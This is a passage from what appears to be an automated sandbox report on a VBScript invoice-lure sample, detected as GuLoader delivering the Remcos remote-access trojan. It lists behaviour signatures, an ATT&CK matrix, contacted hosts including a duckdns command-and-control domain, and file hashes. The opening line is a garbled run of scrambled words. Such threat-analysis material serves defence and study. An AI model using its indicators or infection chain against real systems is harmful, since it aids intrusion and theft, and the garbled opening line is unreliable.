arveiunplunp,rtntforvrm aligabed mndemisa,laasg,arneepregnrgeote]meggy: fors: neutsd sjueprovocganesuencryrguaiai proltjou nyexcepptankbrudenoohu kat hymnosummectil aoforbrlphen garn=under dic,[ es.in di peln svtfrems. mispsca lietitilc udsuutyk Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1632, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0Jump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1632, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		221
              Scripting              		111
              Process Injection              		11
              Masquerading              		OS Credential Dumping11
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		31
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Remote Access Software              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)111
              Process Injection              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook12
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging113
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522515 Sample: NTS_eTaxInvoice.html.vbs Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 25 drive.usercontent.google.com 2->25 27 drive.google.com 2->27 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Yara detected GuLoader 2->43 45 8 other signatures 2->45 8 wscript.exe 1 2->8         started        11 powershell.exe 18 2->11         started        13 msiexec.exe 2->13         started        signatures3 process4 signatures5 47 VBScript performs obfuscated calls to suspicious functions 8->47 49 Suspicious powershell command line found 8->49 51 Wscript starts Powershell (via cmd or directly) 8->51 57 2 other signatures 8->57 15 powershell.exe 14 18 8->15         started        53 Writes to foreign memory regions 11->53 55 Found suspicious powershell code related to unpacking or dynamic code loading 11->55 19 msiexec.exe 6 11->19         started        21 conhost.exe 11->21         started        process6 dnsIp7 29 drive.usercontent.google.com 142.250.186.33, 443, 49727, 49734 GOOGLEUS United States 15->29 31 drive.google.com 172.217.18.14, 443, 49726 GOOGLEUS United States 15->31 35 Found suspicious powershell code related to unpacking or dynamic code loading 15->35 23 conhost.exe 15->23         started        33 172.217.16.206, 443, 49733 GOOGLEUS United States 19->33 37 Detected Remcos RAT 19->37 signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              NTS_eTaxInvoice.html.vbs7%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              https://apis.google.com0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              drive.google.com
              		172.217.18.14
              		truefalse
                		unknown
                drive.usercontent.google.com
                		142.250.186.33
                		truefalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  a458386d9.duckdns.orgtrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.google.compowershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://drive.usercontent.google.compowershell.exe, 00000002.00000002.2343774310.000001D301DBC000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.microsoftpowershell.exe, 00000002.00000002.2381359043.000001D36D530000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://drive.google.com/msiexec.exe, 00000008.00000002.2738469481.000000000645A000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://go.micropowershell.exe, 00000002.00000002.2343774310.000001D301459000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://aka.ms/pscore6lBcqpowershell.exe, 00000004.00000002.2737460035.0000000004161000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://contoso.com/powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://drive.usercontent.googhppowershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Licensepowershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 00000004.00000002.2759953043.00000000051C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://drive.googPpowershell.exe, 00000002.00000002.2343774310.000001D301D7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://drive.google.compowershell.exe, 00000002.00000002.2343774310.000001D301642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300228000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://drive.usercontent.google.compowershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300495000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://drive.usercontent.google.com/msiexec.exe, 00000008.00000003.2698660494.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2662532062.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://drive.google.compowershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.2343774310.000001D300001000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://apis.google.compowershell.exe, 00000002.00000002.2343774310.000001D301DA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301D82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D300491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2343774310.000001D301DA8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656000497.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2656061067.000000000650C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2343774310.000001D300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2737460035.0000000004161000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2737460035.00000000042B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              172.217.16.206
                                              		unknownUnited States
                                              		15169GOOGLEUSfalse
                                              172.217.18.14
                                              		drive.google.comUnited States
                                              		15169GOOGLEUSfalse
                                              142.250.186.33
                                              		drive.usercontent.google.comUnited States
                                              		15169GOOGLEUSfalse

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1522515
                                              Start date and time:2024-09-30 09:56:09 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 15s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:12
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:NTS_eTaxInvoice.html.vbs
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winVBS@9/7@3/3
                                              EGA Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 79%
                                              • Number of executed functions: 51
                                              • Number of non-executed functions: 23
                                              Cookbook Comments:
                                              • Found application associated with file extension: .vbs

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.190.159.75, 20.190.159.73, 20.190.159.23, 40.126.31.69, 20.190.159.4, 20.190.159.68, 20.190.159.64, 20.190.159.2
                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                              • Execution Graph export aborted for target msiexec.exe, PID 1632 because there are no executed function
                                              • Execution Graph export aborted for target powershell.exe, PID 1788 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 1812 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              03:57:19API Interceptor87x Sleep call for process: powershell.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASNs

                                              No context

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0e11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbsGet hashmaliciousGuLoaderBrowse
                                              • 142.250.186.33
                                              • 172.217.18.14
                                              Urgent Quotation Notification_pdf.vbsGet hashmaliciousUnknownBrowse
                                              • 142.250.186.33
                                              • 172.217.18.14
                                              http://hrlaw.com.auGet hashmaliciousUnknownBrowse
                                              • 142.250.186.33
                                              • 172.217.18.14
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 142.250.186.33
                                              • 172.217.18.14
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 142.250.186.33
                                              • 172.217.18.14
                                              CAPE MARS VSL'S PARTICULARS.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 142.250.186.33
                                              • 172.217.18.14
                                              MV TASOS Vessel's Details.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 142.250.186.33
                                              • 172.217.18.14
                                              COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                              • 142.250.186.33
                                              • 172.217.18.14
                                              https://okfun188.com/Get hashmaliciousUnknownBrowse
                                              • 142.250.186.33
                                              • 172.217.18.14
                                              https://mukirecords.com/Get hashmaliciousUnknownBrowse
                                              • 142.250.186.33
                                              • 172.217.18.14
                                              37f463bf4616ecd445d4a1937da06e19Faktura_82666410_1361590461#U00b7pdf.vbeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 172.217.16.206
                                              • 142.250.186.33
                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                              • 172.217.16.206
                                              • 142.250.186.33
                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                              • 172.217.16.206
                                              • 142.250.186.33
                                              SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                              • 172.217.16.206
                                              • 142.250.186.33
                                              SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                              • 172.217.16.206
                                              • 142.250.186.33
                                              SecuriteInfo.com.Win32.BackdoorX-gen.13984.32209.exeGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                              • 172.217.16.206
                                              • 142.250.186.33
                                              file.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
                                              • 172.217.16.206
                                              • 142.250.186.33
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 172.217.16.206
                                              • 142.250.186.33
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 172.217.16.206
                                              • 142.250.186.33
                                              SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeGet hashmaliciousUnknownBrowse
                                              • 172.217.16.206
                                              • 142.250.186.33

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):8003
                                              Entropy (8bit):4.840877972214509
                                              Encrypted:false
                                              SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                              MD5:106D01F562D751E62B702803895E93E0
                                              SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                              SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                              SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):1.1940658735648508
                                              Encrypted:false
                                              SSDEEP:3:NlllulnmWllZ:NllUmWl
                                              MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                              SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                                              SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                                              SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:@...e................................................@..........

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cusozop1.h1r.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_farvirze.w5m.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5dhknl5.0j1.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmegujnc.51n.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
